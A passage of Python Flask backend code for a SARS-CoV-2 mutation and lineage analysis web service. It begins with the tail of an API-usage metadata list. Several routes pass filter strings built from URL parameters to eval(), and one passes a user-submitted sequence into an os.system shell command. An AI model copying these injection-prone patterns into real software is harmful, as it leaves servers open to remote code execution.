"call"}, {"api_name": "os.path.join", "line_number": 269, "usage_type": "call"}, {"api_name": "os.path", "line_number": 269, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 270, "usage_type": "call"}, {"api_name": "os.path", "line_number": 270, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 271, "usage_type": "call"}, {"api_name": "os.path", "line_number": 271, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 272, "usage_type": "call"}, {"api_name": "os.path", "line_number": 272, "usage_type": "attribute"}, {"api_name": "shutil.rmtree", "line_number": 283, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 288, "usage_type": "call"}]} +{"seq_id": "34049418729", "text": "from flask import Flask\nfrom flask import request, jsonify, send_from_directory, send_file\nfrom flask_cors import CORS, cross_origin\n\napp = Flask(__name__)\ncors = CORS(app)\n\nimport pandas as pd\nfrom datetime import datetime\nimport json\nimport os\nimport statistics\nfrom faker import Factory\n\nimport fbprophet\nfrom matplotlib import pyplot as plt\n\nimport simplejson as json\n\nimport uuid\nimport shutil\nfrom auxiliar_functions import _get_mutations, _get_domain, _get_muts_in_domains, send_success_email\n\nimport Levenshtein\n\n#Acesso a libs do C/C++\nimport ctypes\n\n#directory=\"/var/www/html/\"\n#host=\"localhost:5000\"\n#ip=\"127.0.0.1\"\n\ndirectory=\"/var/www/html/foca_backend/\"\nhost=\"127.0.0.1\"\nip=\"127.0.0.1\"\n\n@app.route(\"/\")\ndef principal():\n return \"FOCA\"\n\n@app.route('/static/results/')\ndef serve_static(filename):\n root_dir = os.path.dirname(os.getcwd())\n root_dir = directory\n return send_from_directory( os.path.join(root_dir, 'data_exportation'), filename)\n\n@app.route('/get_proteins', methods=['GET'])\ndef section0_get_proteins():\n proteins=[]\n f=open(directory+\"data/proteins.tsv\",\"r\")\n for line in f:\n l=line.replace(\"\\n\", \"\")\n proteins.append(l)\n f.close()\n\n resp={\"msg\": proteins}\n\n return json.dumps(resp)\n\n@app.route('/get_locations', methods=['GET'])\ndef section0_get_locations():\n locations=[]\n f=open(directory+\"data/location.tsv\",\"r\")\n for line in f:\n l=line.replace(\"\\n\", \"\")\n try:\n a=int(l)\n except:\n wrong=['bat','canine','cat','dog','dog ','env','gorilla','hamster','leopard','lion','mink','monkey','mouse','pangolin','snow_leopard','tiger']\n if(not l in wrong):\n locations.append(l)\n f.close()\n\n resp={\"msg\": locations}\n\n return json.dumps(resp)\n\n@app.route('/get_lineages', methods=['GET'])\ndef section0_get_lineages():\n lineages=[]\n f=open(directory+\"data/lineage.tsv\",\"r\")\n for line in f:\n l=line.replace(\"\\n\", \"\")\n lineages.append(l)\n f.close()\n\n resp={\"msg\": lineages}\n\n return json.dumps(resp)\n\n@app.route('/get_status', methods=['GET'])\ndef section0_get_status():\n status=[]\n f=open(directory+\"data/demography/list_status.tsv\",\"r\")\n for line in f:\n l=line.replace(\"\\n\", \"\")\n status.append(l)\n f.close()\n\n resp={\"msg\": status}\n\n return json.dumps(resp)\n\n@app.route('/last_update', methods=['GET'])\ndef section1_last_update():\n lu=\"\"\n f=open(directory+\"data/last_update.tsv\",\"r\")\n for line in f:\n l=line.replace(\"\\n\", \"\")\n lu=l\n f.close()\n\n resp={\"msg\": lu}\n return json.dumps(resp)\n\n# Page demography analysis\n@app.route('/get_demography_plots', methods=['GET'])\ndef section_get_plots_demography():\n resp={\"error\": \"\"}\n with open(directory+'data/demography/global_data.json', 'r') as fp:\n dat = json.load(fp) \n resp[\"global_geo_data\"]=dat\n \n with open(directory+'data/demography/global_info.json', 'r') as fp:\n dat = json.load(fp) \n resp[\"global_geo_info\"]=dat\n \n with open(directory+'data/demography/by_age_data.json', 'r') as fp:\n dat = json.load(fp) \n resp[\"plot_age\"]=dat\n \n with open(directory+'data/demography/by_voc_data.json', 'r') as fp:\n dat = json.load(fp) \n resp[\"plot_voc\"]=dat\n \n with open(directory+'data/demography/by_patient_status_data.json', 'r') as fp:\n dat = json.load(fp) \n resp[\"plot_status\"]=dat\n \n with open(directory+'data/demography/age_by_voc_data.json', 'r') as fp:\n dat = json.load(fp) \n resp[\"plot_age_voc\"]=dat\n \n with open(directory+'data/demography/age_by_status_data.json', 'r') as fp:\n dat = json.load(fp) \n resp[\"plot_age_status\"]=dat\n \n with open(directory+'data/demography/status_by_voc_data.json', 'r') as fp:\n dat = json.load(fp) \n resp[\"plot_status_voc\"]=dat\n\n return json.dumps(resp)\n\n@app.route('/get_table_demography/////', methods=['GET'])\ndef section_get_table_demography(lineage, location, status, gender, age):\n data={\"error\": \"\", \"columns\": [], \"table\": [], \"file_export\": \"/static/results/\"}\n \n uui=str(uuid.uuid4())\n \n df=pd.read_csv(directory+'data/demography/metadata_demography.tsv', sep='\\t')\n conditions=[]\n lineage=lineage.replace(\"-\",\".\")\n if(lineage!=\"All\"):\n conditions.append(' ( df[\"Lineage\"]==\"'+lineage+'\" ) ')\n \n if(location!=\"All\"):\n conditions.append(' ( df[\"Location\"]==\"'+location+'\" ) ')\n \n if(status!=\"All\"):\n conditions.append(' ( df[\"Status\"].str.contains(\"'+status+'\", na=False) ) ')\n \n if(gender!=\"All\"):\n conditions.append(' ( df[\"Gender\"]==\"'+gender+'\" ) ')\n \n if(age!=\"\"):\n conditions.append(' ( df[\"Age\"]>'+age+' ) ')\n \n condition=\"( \"+' & '.join(conditions)+\" )\"\n if(len(conditions)>0):\n df = df[ eval(condition) ]\n \n if(len(df)!=0):\n #g=open(directory+'data_exportation/'+uui+\".tsv\", \"w\")\n columns=[]\n data['columns']=[]\n for col in df.columns:\n columns.append(col)\n data['columns'].append({ \"title\" : col } )\n \n data['columns']=data['columns'][:-1]\n \n df.to_csv(directory+'data_exportation/'+uui+\".tsv\", sep=\"\\t\")\n df=df.iloc[:1000, :-1]\n #g.write( ('\\t'.join(columns))+\"\\n\")\n \n for i in range(len(df)):\n dat=list(df.iloc[i, :])\n c=0\n for d in dat:\n dat[c]=str(d)\n c+=1 \n \n if(i<1000):\n data[\"table\"].append( dat )\n #g.write( ('\\t'.join(dat))+\"\\n\")\n #g.close()\n \n data['file_export'] += uui+'.tsv'\n else:\n data['error']='There are no matches for your filters.'\n \n return json.dumps(data)\n\n# Page entropy vocs analysis\n@app.route('/entropy_position_analysis//////', methods=['GET'])\ndef section_entropy_position_analysis(lineage, protein, position, effect, count, proportion):\n groups={ 'Non Polar': ['G','A','V','C','P','L', 'I', 'M','W','F'], 'Polar': ['S','T','Y','N','Q'], 'Positive Charge': ['K','R','H'], 'Negative Charge': ['D','E'] }\n revg={\"del\": \"-\"}\n for g in groups:\n for aa in groups[g]:\n revg[aa]=g\n \n uui=str(uuid.uuid4())\n \n sr={}\n with open(directory+'data/snap_data.json', 'r') as fp:\n sr = json.load(fp) \n \n data={\"error\": \"\",\"table_entropy\": [], \"file_export\": \"/static/results/\"}\n \n # Generating table\n df=pd.read_csv(directory+'data/report_position_probabilities_by_lineage.tsv', sep='\\t')\n conditions=[]\n lineage=lineage.replace(\"-\",\".\")\n proportion=proportion.replace(\"-\",\".\")\n if(lineage!=\"All\"):\n conditions.append(' ( df[\"Lineage\"]==\"'+lineage+'\" ) ')\n \n if(protein!=\"All\"):\n cproteins=[]\n for m in protein.split(','):\n cproteins.append(' ( df[\"Protein\"]==\"'+m+'\" ) ')\n conditions.append(\"( \"+' | '.join(cproteins)+\" )\")\n \n if(position!=\"All\"):\n conditions.append(' ( df[\"Position\"]==\"'+position+'\" ) ')\n \n if(count!=\"\"):\n conditions.append(' ( df[\"Count\"]>'+count+' ) ')\n \n if(proportion!=\"\"):\n conditions.append(' ( df[\"Proportion\"]>'+proportion+' ) ')\n \n condition=\"( \"+' & '.join(conditions)+\" )\"\n if(len(conditions)>0):\n df = df[ eval(condition) ]\n \n if(len(df)!=0):\n g=open(directory+'data_exportation/'+uui+\".tsv\", \"w\")\n columns=[]\n data['columns']=[]\n for c in df.columns:\n columns.append(c)\n data['columns'].append({ \"title\" : c } )\n \n columns+=[\"SNAP effect\",\"SNAP prediction\"]\n data['columns']+=[{ \"title\" : 'SNAP effect' }, { \"title\": 'SNAP prediction' }]\n \n g.write( ('\\t'.join(columns))+\"\\n\")\n \n for i in range(len(df)):\n protein=df.iloc[i,1].lower()\n position = str(df.iloc[i,2])\n aas = df.iloc[i,5].split(\" to \")\n \n sn=[\"-\",\"-\"]\n if( protein+\"_\"+aas[0]+position+aas[1] in sr.keys()):\n sn=sr[protein+\"_\"+aas[0]+position+aas[1]]\n \n if(sn[0]==effect or effect==\"All\"):\n dat=list(df.iloc[i, :])+sn\n if(i<1000):\n data[\"table_entropy\"].append( dat )\n \n c=0\n for d in dat:\n dat[c]=str(d)\n c+=1 \n g.write( ('\\t'.join(dat))+\"\\n\")\n g.close()\n \n data['file_export'] += uui+'.tsv'\n else:\n data['error']='There are no matches for your filters.'\n \n return json.dumps(data)\n\n@app.route('/plot_entropy_position_analysis_by_period//', methods=['GET'])\ndef section_plot_entropy_position_analysis_by_period(lineage, location):\n # Generating plot over time\n fake = Factory.create()\n \n resp={}\n \n if(location==\"All\"):\n df=pd.read_csv(directory+'data/report_position_probabilities_by_lineage_period.tsv', sep='\\t')\n else:\n df=pd.read_csv(directory+\"data/entropy/\"+location.replace(\" \", \"-\")+\"_report_position_probabilities_by_lineage_period.tsv\", sep='\\t')\n df1 = df[ df[\"Lineage\"] == lineage ]\n \n data={}\n labels=[]\n colors={}\n \n the=1.5\n mo=datetime.now().month\n y=datetime.now().year\n mo=5\n y=2021\n \n back=['#39C9CF','#3180D4', '#20b2aa', '#bc8f8f', \"#E6E6FA\", \"#C68FDA\"]\n co=0\n # check positions that maintain hight entropy\n posi={}\n ids=[]\n for m in range(mo-5, mo+1):\n df=df1[ ( (df1['Month']==m) & (df1['Year']==y) ) ]\n if(len(df)>0):\n lab=str(m)+\"/\"+str(y)\n posi[lab]={}\n df=df.sort_values('Entropy', ascending=False) \n pos=[] \n for i in range(len(df)):\n y_=df.iloc[i,8] # for count\n y_=df.iloc[i,5] # for entropy\n if(y_ > the):\n p=str(df.iloc[i,4])\n if(not p in pos):\n pos.append(p)\n prot=df.iloc[i,3]\n posi[lab][prot+\"_\"+p]=y_\n if(not prot+\"_\"+p in ids):\n ids.append(prot+\"_\"+p)\n cnt={}\n for i in ids:\n cnt[i]=0\n for p in posi.keys():\n if(i in posi[p].keys()):\n cnt[i]+=1\n \n \n co=0\n for m in range(mo-5, mo+1):\n df=df1[ ( (df1['Month']==m) & (df1['Year']==y) ) ]\n if(len(df)>0):\n df=df.sort_values('Entropy', ascending=False)\n lab=str(m)+\"/\"+str(y)\n \n data[lab]=[ [], [], { 'color': back[co] } ]\n \n pos = []\n end = len(df)\n #if(end>20):\n # end=20\n \n for i in range(len(df)):\n y_=df.iloc[i,8] # for count\n y_=df.iloc[i,5] # for entropy\n if(y_ > the):\n p=str(df.iloc[i,4])\n if(not p in pos):\n prot=df.iloc[i,3]\n xlab=prot+\"_\"+p\n #if(xlab in cnt.keys()):\n # if(cnt[xlab]>2):\n pos.append(p)\n \n data[lab][0].append(xlab)\n data[lab][1].append(str(y_))\n \n if(len(pos)==3):\n break\n co+=1 \n \n bars=[]\n for k in data.keys():\n bars.append( { \"x\": data[k][0], \"y\": data[k][1], \"name\": k, \"marker\": data[k][2], \"type\": \"bar\" } )\n \n resp[\"error\"]=\"\"\n resp[\"data\"]=bars\n \n return json.dumps(resp)\n\n@app.route('/entropy_position_analysis_by_period//////', methods=['GET'])\ndef section_entropy_position_analysis_by_period(lineage, protein, position, effect, month, year):\n groups={ 'Non Polar': ['G','A','V','C','P','L', 'I', 'M','W','F'], 'Polar': ['S','T','Y','N','Q'], 'Positive Charge': ['K','R','H'], 'Negative Charge': ['D','E'] }\n revg={}\n for g in groups:\n for aa in groups[g]:\n revg[aa]=g\n \n uui=str(uuid.uuid4())\n \n data={\"error\": \"\", \"table_entropy\": [], \"file_export\": \"/static/results/\"}\n \n df=pd.read_csv(directory+'data/report_position_probabilities_by_lineage_period.tsv', sep='\\t')\n \n # Geenerating table\n sr={}\n with open(directory+'data/snap_data.json', 'r') as fp:\n sr = json.load(fp) \n \n conditions=[]\n lineage=lineage.replace(\"-\",\".\")\n if(lineage!=\"All\"):\n conditions.append(' ( df[\"Lineage\"]==\"'+lineage+'\" ) ')\n \n if(protein!=\"All\"):\n cproteins=[]\n for m in protein.split(','):\n cproteins.append(' ( df[\"Protein\"]==\"'+m+'\" ) ')\n conditions.append(\"( \"+' | '.join(cproteins)+\" )\")\n \n if(position!=\"All\"):\n conditions.append(' ( df[\"Position\"]=='+position+' ) ')\n \n if(month!=\"All\"):\n conditions.append(' ( df[\"Month\"]=='+month+' )')\n \n if(year!=\"All\"):\n conditions.append(' ( df[\"Year\"]=='+year+' ) ')\n \n condition=\"( \"+' & '.join(conditions)+\" )\"\n if(len(conditions)>0):\n df = df[ eval(condition) ]\n \n if(len(df)!=0):\n g=open(directory+'data_exportation/'+uui+\".tsv\", \"w\")\n columns=[]\n data['columns']=[]\n for c in df.columns:\n columns.append(c)\n data['columns'].append({ \"title\" : c } )\n \n columns+=[\"SNAP effect\",\"SNAP prediction\"]\n data['columns']+=[{ \"title\" : 'SNAP effect' }, { \"title\": 'SNAP prediction' }]\n \n g.write( ('\\t'.join(columns))+\"\\n\")\n \n for i in range(len(df)):\n protein=df.iloc[i,3].lower()\n position = str(df.iloc[i,4])\n aas = df.iloc[i,7].split(\" to \")\n \n sn=[\"-\",\"-\"]\n if( protein+\"_\"+aas[0]+position+aas[1] in sr.keys()):\n sn=sr[protein+\"_\"+aas[0]+position+aas[1]]\n \n if(sn[0]==effect or effect==\"All\"):\n dat=list(df.iloc[i, :])+sn\n if(i<1000):\n data[\"table_entropy\"].append( dat )\n \n c=0\n for d in dat:\n dat[c]=str(d)\n c+=1 \n g.write( ('\\t'.join(dat))+\"\\n\")\n g.close()\n \n data['file_export'] += uui+'.tsv'\n else:\n data['error']='There are no matches for your filters.'\n \n return json.dumps(data)\n\n# Page structural & functional analysis\n@app.route('/structural_functional_analysis', methods=['POST'])\ndef section_structural_analysis():\n groups={ 'Non Polar': ['G','A','V','C','P','L', 'I', 'M','W','F'], 'Polar': ['S','T','Y','N','Q'], 'Positive Charge': ['K','R','H'], 'Negative Charge': ['D','E'] }\n revg={}\n for g in groups:\n for aa in groups[g]:\n revg[aa]=g\n \n uui=str(uuid.uuid4())\n \n seq = request.form.get('sequence')\n user_email = request.form.get('email')\n \n f=open(directory+\"structural_effects/data/ref_sequence.fasta\",\"r\")\n for line in f:\n if(line.find(\">\")==-1):\n ref=line.replace(\"\\n\",\"\")\n f.close()\n \n flag=True\n if(seq.find(\"\\n\")!=-1):\n st=\"\"\n temp=seq.split(\"\\n\")\n for t in temp:\n if(t.find(\">\")!=-1):\n if(st!=\"\"):\n flag=False\n \n if(flag and t.find(\">\")==-1):\n st+=t.replace(\"*\", \"\")\n seq=st\n simi = Levenshtein.ratio(seq, ref) \n \n data={\"error\": \"\", \"error_email\": \"\", \"mutations\": \"\", \"domains\":\"\", \"rmsd\": \"\",\"table_mutations\": [],\"table_stability\": [], \"file_export\": \"/static/results/\"}\n \n if(simi > 0.4):\n os.system(\"bash \"+directory+\"structural_effects/run.sh \"+seq+\" \"+uui+\" \"+directory+\"\")\n \n sr={}\n snap=pd.read_csv(directory+\"structural_effects/spike.csv\", sep=\",\")\n var=list(snap.iloc[:,0])\n effect=list(snap.iloc[:,1])\n accuracy=list(snap.iloc[:,2])\n c=0\n for v in var:\n sr[v]=[effect[c], accuracy[c]]\n c+=1\n \n \n if(os.path.isfile(directory+\"structural_effects/\"+uui+\"/step1_report.txt\")):\n f=open(directory+\"structural_effects/\"+uui+\"/step1_report.txt\",\"r\")\n for line in f:\n l=line.replace(\"\\n\",\"\")\n if(l.find(\"RMSD\")!=-1):\n data['rmsd']=l.split(\":\")[1]\n f.close()\n \n if(os.path.isfile(directory+\"structural_effects/\"+uui+\"/mutations.txt\")):\n g=open(directory+\"structural_effects/\"+uui+\"/functional_mutations_report.tsv\",\"w\")\n g.write(\"Mutation\\tSNAP effect\\tSNAP prediction\\tAA group reference\\tAA group alternative\\n\")\n \n muts=[]\n pos=[]\n interest=[]\n f=open(directory+\"structural_effects/\"+uui+\"/mutations.txt\",\"r\")\n for line in f:\n l=line.replace(\"\\n\",\"\")\n \n muts.append(l[1:])\n pos.append(l[2:-1])\n \n ref=revg[l[1]]\n alt=\"del\"\n if(l[1:].find(\"-\")==-1):\n alt=revg[l[-1]]\n else:\n sr[l[1:]] = [\"-\", \"-\"]\n \n if(sr[l[1:]][0]=='effect'):\n interest.append(l[1:])\n \n dat=[ l[1:], sr[l[1:]][0], str(sr[l[1:]][1]), ref, alt ]\n \n data[\"table_mutations\"].append( dat )\n \n g.write(('\\t'.join(dat))+\"\\n\")\n f.close()\n \n if(len(pos) > 1):\n data[\"mutations\"] = \"(\"+(' or '.join(pos))+\")\"\n if(len(pos) == 1):\n data[\"mutations\"] = ' or '.join(pos)\n \n infodom = _get_domain(seq, \"Spike\") \n data['domains'] = infodom[0]\n data['domains'] = \"

    Mutation(s) of interest according to functional impact prediction: \"+(''.join(interest))+\"


    \"\n domsspike=['PS51921-BCOV_S1_CTD','PS51922-BCOV_S1_NTD','PS51923-COV_S2_HR1','PS51924-COV_S2_HR2']\n refcds=['9-303','334-527','896-1001','1143-1225']\n dnotnew=[]\n cnotnew={}\n dnot=[]\n cnot={}\n dok=[]\n cd=0\n for dm in infodom[1]:\n if(dm in domsspike):\n dok.append(dm+\" (\"+infodom[2][cd]+\")\")\n else:\n dnotnew.append(dm+\" (\"+infodom[2][cd]+\")\")\n if(not dm in cnotnew.keys()):\n cnotnew[dm]=[dm+\" (\"+infodom[2][cd]+\")\", []]\n cnotnew[dm][1] += _get_muts_in_domains(seq, infodom[2][cd], pos, muts)\n cd+=1\n \n if(len(dok)0):\n data['domains']+=\"

    Spike Domains in this sequence: \"+('; '.join(dok))+\"

    \"\n \n if(len(dnot)>0):\n data['domains']+=\"

    Spike reference domains not found in this sequence:

      \"\n for k in cnot.keys():\n data['domains']+=\"
    • \"+cnot[k][0]\n if(len(cnot[k])>0):\n data['domains']+=\" - Mutation(s): \"+(', '.join(cnot[k][1]))\n data['domains']+=\"
    • \"\n data['domains']+=\"
    \"\n \n if(len(dnotnew)>0):\n data['domains']+=\"

    Extra Domains (not found in Spike reference protein):

      \"\n for k in cnotnew.keys():\n data['domains']+=\"
    • \"+cnotnew[k][0]\n if(len(cnotnew[k])>0):\n data['domains']+=\" - Mutation(s): \"+(', '.join(cnotnew[k][1]))\n data['domains']+=\"
    • \"\n data['domains']+=\"
    \"\n \n g.close()\n \n stab={ \"BackHbond\": \"Backbone H. Bonds\", \"SideHbond\": \"Sidechain H. Bonds\", \"Energy_VdW\": \"Energy Van der Walls\", \"Electro\": \"Eletrostatic\", \"Energy_SolvP\": \"Energy Solvent Polar\", \"Energy_SolvH\": \"Energy Solvent Hydrophobic\", \"Energy_vdwclash\": \"Energy Van der Walls clashes\", \"energy_torsion\": \"Energy of Torsions\", \"backbone_vdwclash\": \"Backbone Van der Walls Clashes\", \"Entropy_sidec\": \"Entropy Sidechain\", \"Entropy_mainc\": \"Entropy Mainchain\", \"water bonds\": \"Water Bonds\", \"helix dipole\": \"Helix Dipole\", \"loop_entropy\": \"Loop Entropy\", \"cis_bond\": \"Cis Bonds\", \"disulfide\": \"Disulfide\", \"kn electrostatic\": \"Electrostatic Kon\", \"partial covalent interactions\": \"Partial Covalent Interactions\", \"Energy_Ionisation\": \"Energy of Ionisation\", \"Entropy Complex\": \"Entropy of Complex\", \"Total\": \"Total Energy\" }\n \n if(os.path.isfile(directory+\"structural_effects/\"+uui+\"/step1_table_stability_comparison.tsv\")):\n df=pd.read_csv(directory+\"structural_effects/\"+uui+\"/step1_table_stability_comparison.tsv\", sep=\"\\t\")\n for i in range(len(df)):\n \n if(df.iloc[i, 1]!=\"backbone_vdwclash\" and df.iloc[i,1]!=\"kn electrostatic\"):\n df.iloc[i, 1] = stab[df.iloc[i, 1][:-1]]\n else:\n df.iloc[i, 1] = stab[df.iloc[i, 1]]\n \n if(df.iloc[i, 1]==\"Total Energy\"):\n diff = df.iloc[i,2]-df.iloc[i,3]\n if(abs(diff)>50):\n data['domains']+=\"

    According to the energy parameters of stability analysis, the protein has a difference of \"+str(diff)+\" in relation to the reference Spike protein, which indicates that the structural properties have changed like the solvent accessibility and secondary structure. The complete table of energy stability analysis was sent by e-mail.

    \"\n else:\n data['domains']+=\"

    According to the energy parameters of stability analysis, the protein has an acceptable difference of total energy in relation to the Spike reference protein, which does not impact in the structural properties. The complete table of energy stability analysis was sent by e-mail.

    \"\n \n data[\"table_stability\"].append( list(df.iloc[i, :]) )\n else:\n data[\"error\"] = \"The mutations were not found in the reference 3D Spike structure\"\n else:\n data[\"error\"] = \"There are no mutations in the sequence\"\n else:\n data[\"error\"] = \"This sequence has less than 40% of similarity with Spike.\"\n \n shutil.make_archive(directory+\"data_exportation/\"+uui, 'zip', directory+\"structural_effects/\"+uui)\n data['file_export'] += uui+'.zip'\n \n os.system(\"rm -rf \"+directory+\"structural_effects/\"+uui)\n \n try:\n link=host+\"/\"+data['file_export']\n send_success_email(user_email, link, directory+\"data_exportation/\"+uui)\n except:\n data[\"error_email\"] = \"It was not possible sending the results to the provided e-mail.\"\n \n return json.dumps(data)\n\n# Page descriptive analysis\n@app.route('/get_br_state_plots', methods=['GET'])\ndef section_get_plots_brstate():\n resp={\"error\": \"\"}\n with open(directory+'data/br_state_analysis_plot.json', 'r') as fp:\n dat = json.load(fp) \n resp[\"global_geo_info\"]=dat\n \n with open(directory+'data/br_state_analysis_data.json', 'r') as fp:\n dat = json.load(fp) \n resp[\"global_geo_data\"]=dat\n \n return json.dumps(resp)\n \n@app.route('/get_plot_forecasting//', methods=['GET'])\ndef section2_get_plot_forecasting(location, protein):\n df=pd.read_csv(directory+'data/forecasting/'+location.replace(\" \",\"-\")+\"_forecasting.tsv\", sep=\"\\t\")\n df = df[ df[\"protein\"]==protein ]\n dfaux=pd.DataFrame()\n dfaux['ds']=df['date']\n dfaux['y']=df['y']\n gm_prophet = fbprophet.Prophet(changepoint_prior_scale=0.15)\n gm_prophet.fit(dfaux)\n # Make a future dataframe for 2 years\n gm_forecast = gm_prophet.make_future_dataframe(periods=30, freq='D')\n # Make predictions\n gm_forecast = gm_prophet.predict(gm_forecast)\n gm_prophet.plot(gm_forecast, xlabel = 'Date', ylabel = 'Mean Mutations')\n plt.title('Mutations - Predicting next days')\n plt.savefig(directory+'data_exportation/'+location.replace(\" \",\"-\")+\"_\"+protein+\"_forecasting.png\")\n \n resp = {\"file_export\": '/static/results/'+location.replace(\" \",\"-\")+\"_\"+protein+\"_forecasting.png\"}\n \n return json.dumps(resp)\n \n@app.route('/mutations_mean_by_period////', methods=['GET'])\ndef section2_get_mean_mutations_period(location, period, protein, type_):\n # from hive sec0: proteins, locations\n \n # select id_genome_output, nm_nation, nm_lineage, dt_collect, nm_aminoacid_modified, nm_protein from gisaid.vw_genome_protein_domain where nm_nation='Brazil' and nm_protein='Spike'\n \n prs=protein.split(\",\")\n colors=[\"#1E90FF\",\"#228B22\",\"#BC8F8F\",\"#B0E0E6\"]\n\n with open(directory+'data/mutation_indel/'+location.replace(\" \",\"-\")+\"_\"+period+'_mutation_indel.json', 'r') as fp:\n dat = json.load(fp) \n data=dat[type_] \n labels=dat['labels']\n \n c=0\n #conditions=[]\n for p in prs:\n #conditions.append(\" nm_protein='\"+p+\"' \")\n\n data[p][\"label\"]=p\n data[p][\"borderColor\"]=colors[c]\n data[p][\"tension\"]=0.1\n data[p][\"fill\"]=False\n data[p][\"backgroundColor\"]=colors[c]\n #data[p][\"data\"]=[]\n #data[p][\"deviation\"]=[]\n\n c+=1\n datasets=[]\n \n for p in prs:\n datasets.append(data[p])\n\n resp={\"labels\": labels, \"datasets\": datasets}\n return json.dumps(resp)\n\n@app.route('/lineages_count_by_mutation//', methods=['GET'])\ndef section3_lineagesCount_by_mutation(mutations, hits): # chart pie\n resp={\"error\": \"Invalid input\"}\n try:\n muts=mutations.split(\",\")\n \n with open(directory+'data/lineageCount_by_mutation.json', 'r') as fp:\n dat = json.load(fp)\n \n counts={}\n for m in muts:\n counts[m] = dat[m]\n \n with open(directory+'data/lineageCount.json', 'r') as fp:\n dat = json.load(fp)\n \n uui=str(uuid.uuid4())\n resp={\"error\": \"\", \"file_export\": \"/static/results/\"+uui+\".tsv\"}\n f=open(directory+\"data_exportation/\"+uui+\".tsv\",\"w\")\n f.write(\"Mutation\\tLineage\\tCount\\tProportion\\n\")\n for m in counts.keys():\n resp[m]={\"labels\": [], \"counts\": []}\n sorted_={}\n _list = reversed( sorted( counts[m].items(), key=lambda kv: kv[1] ) )\n i=0\n for l in _list:\n if(i<10 and l[0]!=\"None\"):\n sorted_[l[0]]=l[1]\n i+=1\n \n for l in sorted_.keys():\n if(sorted_[l] > hits):\n resp[m][\"labels\"].append(l)\n resp[m][\"counts\"].append(sorted_[l]/dat[l])\n \n for l in counts[m].keys():\n if(counts[m][l] > hits):\n f.write(\"%s\\t%s\\t%i\\t%.2f\\n\" %( m, l, counts[m][l], counts[m][l]/dat[l] ) )\n f.close()\n except:\n pass\n\n return json.dumps(resp)\n\n@app.route('/countries_count_by_mutation//', methods=['GET'])\ndef section5_countriesCount_by_mutation(mutations, hits): # chart pie\n resp={\"error\": \"Invalid input\"}\n try:\n muts=mutations.split(\",\")\n \n with open(directory+'data/countryCount_by_mutation.json', 'r') as fp:\n dat = json.load(fp)\n \n counts={}\n for m in muts:\n counts[m] = dat[m]\n \n with open(directory+'data/locationsCount.json', 'r') as fp:\n dat = json.load(fp)\n \n uui=str(uuid.uuid4())\n resp={\"error\": \"\", \"file_export\": \"/static/results/\"+uui+\".tsv\"}\n f=open(directory+\"data_exportation/\"+uui+\".tsv\",\"w\")\n f.write(\"Mutation\\tLocation\\tCount\\tProportion\\n\")\n for m in counts.keys():\n resp[m]={\"labels\": [], \"counts\": []}\n sorted_={}\n _list = reversed( sorted( counts[m].items(), key=lambda kv: kv[1] ) )\n i=0\n for l in _list:\n if(i<10 and l[0]!=\"None\" and l[0] in dat.keys()):\n sorted_[l[0]]=l[1]\n i+=1\n \n for l in sorted_.keys():\n if(sorted_[l] > hits):\n resp[m][\"labels\"].append(l)\n resp[m][\"counts\"].append(sorted_[l]/dat[l])\n \n for l in counts[m].keys():\n if(counts[m][l] > hits and l in dat.keys()):\n f.write(\"%s\\t%s\\t%i\\t%.2f\\n\" %( m, l, counts[m][l], counts[m][l]/dat[l] ) )\n f.close()\n except:\n pass\n\n return json.dumps(resp)\n\n@app.route('/mutations_count_by_lineage//', methods=['GET'])\ndef section7_mutationsCount_by_lineage(lineage, hits): # chart pie\n resp={\"error\": \"Invalid input\"}\n try:\n muts=lineage.split(\",\")\n \n with open(directory+'data/mutationCount_by_lineage.json', 'r') as fp:\n dat = json.load(fp)\n \n counts={}\n for m in muts:\n counts[m] = dat[m]\n \n with open(directory+'data/mutationCount.json', 'r') as fp:\n dat = json.load(fp)\n \n uui=str(uuid.uuid4())\n resp={\"error\": \"\", \"file_export\": \"/static/results/\"+uui+\".tsv\"}\n f=open(directory+\"data_exportation/\"+uui+\".tsv\",\"w\")\n f.write(\"Lineage\\tMutation\\tCount\\tProportion\\n\")\n for m in counts.keys():\n resp[m]={\"labels\": [], \"counts\": []}\n sorted_={}\n _list = reversed( sorted( counts[m].items(), key=lambda kv: kv[1] ) )\n i=0\n for l in _list:\n if(i<10 and l[0]!=\"None\" and l[0] in dat.keys()):\n sorted_[l[0]]=l[1]\n i+=1\n \n for l in sorted_.keys():\n if(sorted_[l] > hits):\n resp[m][\"labels\"].append(l)\n resp[m][\"counts\"].append(sorted_[l]/dat[l])\n \n for l in counts[m].keys():\n if(counts[m][l] > hits and l in dat.keys()):\n f.write(\"%s\\t%s\\t%i\\t%.2f\\n\" %( m, l, counts[m][l], counts[m][l]/dat[l] ) )\n f.close()\n except:\n pass\n\n return json.dumps(resp)\n\n@app.route('/unique_mutations_count_by_lineage//', methods=['GET'])\ndef section8_unique_mutationsCount_by_lineage(lineage, hits): # chart pie\n resp={\"error\": \"Invalid input\"}\n try:\n muts=lineage.split(\",\")\n \n with open(directory+'data/uniqueMutationCount_by_lineage.json', 'r') as fp:\n dat = json.load(fp)\n \n counts={}\n for m in muts:\n counts[m] = dat[m]\n \n with open(directory+'data/mutationCount.json', 'r') as fp:\n dat = json.load(fp)\n \n uui=str(uuid.uuid4())\n resp={\"error\": \"\", \"file_export\": \"/static/results/\"+uui+\".tsv\"}\n f=open(directory+\"data_exportation/\"+uui+\".tsv\",\"w\")\n f.write(\"Lineage\\tMutation\\tCount\\tProportion\\n\")\n for m in counts.keys():\n resp[m]={\"labels\": [], \"counts\": []}\n sorted_={}\n _list = reversed( sorted( counts[m].items(), key=lambda kv: kv[1] ) )\n i=0\n for l in _list:\n if(i<10 and l[0]!=\"None\" and l[0] in dat.keys()):\n sorted_[l[0]]=l[1]\n i+=1\n \n for l in sorted_.keys():\n if(sorted_[l] > hits):\n resp[m][\"labels\"].append(l)\n resp[m][\"counts\"].append(sorted_[l]/dat[l])\n \n for l in counts[m].keys():\n if(counts[m][l] > hits and l in dat.keys()):\n f.write(\"%s\\t%s\\t%i\\t%.2f\\n\" %( m, l, counts[m][l], counts[m][l]/dat[l] ) )\n f.close()\n except:\n pass\n\n return json.dumps(resp)\n\n@app.route('/get_mutations_peptide//', methods=['GET'])\ndef section9_get_mutations_peptide(protein, peptide): # chart pie\n resp={\"error\": \"Invalid input\", \"mutations\": \"\"}\n \n try:\n muts=_get_mutations('test', peptide.upper(), 